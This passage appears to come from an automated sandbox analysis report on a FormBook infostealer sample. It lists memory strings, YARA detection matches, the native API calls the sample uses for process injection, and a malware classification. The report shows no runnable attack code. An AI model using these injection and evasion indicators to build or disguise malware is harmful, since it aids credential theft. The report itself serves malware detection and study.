          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004181C0 NtCreateFile,5_2_004181C0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00418270 NtReadFile,5_2_00418270
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004182F0 NtClose,5_2_004182F0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,5_2_004183A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004181BA NtCreateFile,5_2_004181BA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041839A NtAllocateVirtualMemory,5_2_0041839A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459540 NtReadFile,LdrInitializeThunk,5_2_01459540
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01459910
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014595D0 NtClose,LdrInitializeThunk,5_2_014595D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014599A0 NtCreateSection,LdrInitializeThunk,5_2_014599A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459840 NtDelayExecution,LdrInitializeThunk,5_2_01459840
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459860 NtQuerySystemInformation,LdrInitializeThunk,5_2_01459860
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_014598F0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459710 NtQueryInformationToken,LdrInitializeThunk,5_2_01459710
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459FE0 NtCreateMutant,LdrInitializeThunk,5_2_01459FE0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459780 NtMapViewOfSection,LdrInitializeThunk,5_2_01459780
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_014597A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A50 NtCreateFile,LdrInitializeThunk,5_2_01459A50
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01459660
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01459A00
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A20 NtResumeThread,LdrInitializeThunk,5_2_01459A20
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_014596E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459950 NtQueueApcThread,5_2_01459950
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459560 NtWriteFile,5_2_01459560
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459520 NtWaitForSingleObject,5_2_01459520
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145AD30 NtSetContextThread,5_2_0145AD30
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014599D0 NtCreateProcessEx,5_2_014599D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014595F0 NtQueryInformationFile,5_2_014595F0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145B040 NtSuspendThread,5_2_0145B040
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459820 NtEnumerateKey,5_2_01459820
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014598A0 NtWriteVirtualMemory,5_2_014598A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459760 NtOpenProcess,5_2_01459760
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459770 NtSetInformationFile,5_2_01459770
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A770 NtOpenThread,5_2_0145A770
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459B00 NtSetValueKey,5_2_01459B00
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A710 NtOpenProcessToken,5_2_0145A710
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459730 NtQueryVirtualMemory,5_2_01459730
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0145A3B0 NtGetContextThread,5_2_0145A3B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459650 NtQueryValueKey,5_2_01459650
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459670 NtQueryInformationProcess,5_2_01459670
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459610 NtEnumerateValueKey,5_2_01459610
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A10 NtQuerySection,5_2_01459A10
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014596D0 NtCreateKey,5_2_014596D0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01459A80 NtOpenDirectoryObject,5_2_01459A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04779860
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk,10_2_04779840
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779540 NtReadFile,LdrInitializeThunk,10_2_04779540
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04779910
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047795D0 NtClose,LdrInitializeThunk,10_2_047795D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk,10_2_047799A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04779660
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk,10_2_04779A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk,10_2_04779650
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_047796E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk,10_2_047796D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk,10_2_04779710
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk,10_2_04779FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk,10_2_04779780
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477B040 NtSuspendThread,10_2_0477B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779820 NtEnumerateKey,10_2_04779820
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047798F0 NtReadVirtualMemory,10_2_047798F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047798A0 NtWriteVirtualMemory,10_2_047798A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779560 NtWriteFile,10_2_04779560
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779950 NtQueueApcThread,10_2_04779950
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477AD30 NtSetContextThread,10_2_0477AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779520 NtWaitForSingleObject,10_2_04779520
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047795F0 NtQueryInformationFile,10_2_047795F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047799D0 NtCreateProcessEx,10_2_047799D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779670 NtQueryInformationProcess,10_2_04779670
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A20 NtResumeThread,10_2_04779A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779610 NtEnumerateValueKey,10_2_04779610
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A10 NtQuerySection,10_2_04779A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A00 NtProtectVirtualMemory,10_2_04779A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779A80 NtOpenDirectoryObject,10_2_04779A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779770 NtSetInformationFile,10_2_04779770
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A770 NtOpenThread,10_2_0477A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779760 NtOpenProcess,10_2_04779760
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779730 NtQueryVirtualMemory,10_2_04779730
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A710 NtOpenProcessToken,10_2_0477A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04779B00 NtSetValueKey,10_2_04779B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0477A3B0 NtGetContextThread,10_2_0477A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047797A0 NtUnmapViewOfSection,10_2_047797A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B8270 NtReadFile,10_2_027B8270
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B82F0 NtClose,10_2_027B82F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B83A0 NtAllocateVirtualMemory,10_2_027B83A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B81C0 NtCreateFile,10_2_027B81C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B839A NtAllocateVirtualMemory,10_2_027B839A
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B81BA NtCreateFile,10_2_027B81BA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186D4E10_2_0186D4E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186C2B00_2_0186C2B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_018699900_2_01869990
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186FCB00_2_0186FCB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 0_2_0186FCC00_2_0186FCC0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041C07D5_2_0041C07D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B93A5_2_0041B93A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041BB235_2_0041BB23
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00408C605_2_00408C60
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041C5765_2_0041C576
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B52F5_2_0041B52F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B77D5_2_0041B77D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1D555_2_014E1D55
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141F9005_2_0141F900
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2D075_2_014E2D07
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01410D205_2_01410D20
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014341205_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E05_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014425815_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014D10025_2_014D1002
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142841F5_2_0142841F
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142B0905_2_0142B090
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014420A05_2_014420A0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E20A85_2_014E20A8
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2B285_2_014E2B28
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E1FF15_2_014E1FF1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144EBB05_2_0144EBB0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01436E305_2_01436E30
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E2EF75_2_014E2EF7
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E22AE5_2_014E22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048020A810_2_048020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474841F10_2_0474841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047F100210_2_047F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047620A010_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474B09010_2_0474B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04730D2010_2_04730D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0475412010_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048025DD10_2_048025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0473F90010_2_0473F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802D0710_2_04802D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0474D5E010_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801D5510_2_04801D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476258110_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_048022AE10_2_048022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04756E3010_2_04756E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802EF710_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04801FF110_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_04802B2810_2_04802B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_047FDBD210_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0476EBB010_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB93B10_2_027BB93B
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2FB010_2_027A2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A8C6010_2_027A8C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BC57610_2_027BC576
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB52F10_2_027BB52F
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2D9010_2_027A2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A2D8710_2_027A2D87
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0473B150 appears 35 times
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: String function: 0141B150 appears 35 times
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.669296365.0000000006830000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716202775.0000000001171000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeBinary or memory string: OriginalFilenameTextInfo.exe8 vs 350969bc_by_Libranalysis.exe
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 350969bc_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@12/12
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
          Source: 350969bc_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
